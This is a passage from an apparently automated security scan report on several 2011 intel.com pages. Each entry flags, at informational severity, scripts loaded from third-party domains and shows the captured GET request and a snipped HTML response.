<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</script>

<script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...

18.111. http://www.intel.com/consumer/products/processors/core-family.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/processors/core-family.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://use.typekit.com/yhr6rfe.js

Request

GET /consumer/products/processors/core-family.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46999


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</script>
<script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...

18.112. http://www.intel.com/consumer/products/processors/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/processors/index.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://use.typekit.com/yhr6rfe.js

Request

GET /consumer/products/processors/index.htm?iid=subhdr+products_proc HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38943


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</script><script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...

18.113. http://www.intel.com/consumer/products/processors/ratings.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/processors/ratings.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js
  • http://use.typekit.com/yhr6rfe.js

Request

GET /consumer/products/processors/ratings.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44191


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/themes/start/jquery-ui.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...

18.114. http://www.intel.com/consumer/products/technology/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/technology/index.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://use.typekit.com/yhr6rfe.js

Request

GET /consumer/products/technology/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36094


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</script>

<script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...

18.115. http://www.intel.com/consumer/shop/processors/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/shop/processors/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://content.channelintelligence.com/scripts/cii_embeddedfunctions.asp
  • http://content.channelintelligence.com/scripts/ykb_PopupWindow.js

Request

GET /consumer/shop/processors/index.htm?iid=subhdr+shop_proc HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:06 GMT
Content-Length: 29190
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<td width="567" valign="top">
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"></script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/cii_embeddedfunctions.asp" type="text/javascript"></script>
...[SNIP]...

18.116. http://www.intel.com/consumer/shop/ssds.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/shop/ssds.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://content.channelintelligence.com/scripts/cii_embeddedfunctions.asp
  • http://content.channelintelligence.com/scripts/ykb_PopupWindow.js

Request

GET /consumer/shop/ssds.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:06 GMT
Content-Length: 27030
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<td width="567" valign="top">
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"></script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/cii_embeddedfunctions.asp" type="text/javascript"></script>
...[SNIP]...

18.117. http://www.intel.com/en_CA/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /en_CA/index.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://widgets.twimg.com/j/2/widget.js

Request

GET /en_CA/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:14 GMT
Content-Length: 27143
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<meta http-equiv=Content-Type content="text/html; charset=utf-
...[SNIP]...
<div style="margin-left: 3px;">
       <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

18.118. http://www.intel.com/en_SA/consumer/products/processors/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /en_SA/consumer/products/processors/index.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://use.typekit.com/yhr6rfe.js

Request

GET /en_SA/consumer/products/processors/index.htm?iid=gg_en_EG+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39045


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-SA" lang="en-SA">

...[SNIP]...
<link rel="stylesheet" type="text/css" href="/sites/sitewide/ump/css/mod-ump.css" />
<script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...

18.119. http://www.intel.com/itcenter/products/core/core_vpro/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /itcenter/products/core/core_vpro/index.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/3310.js

Request

GET /itcenter/products/core/core_vpro/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; 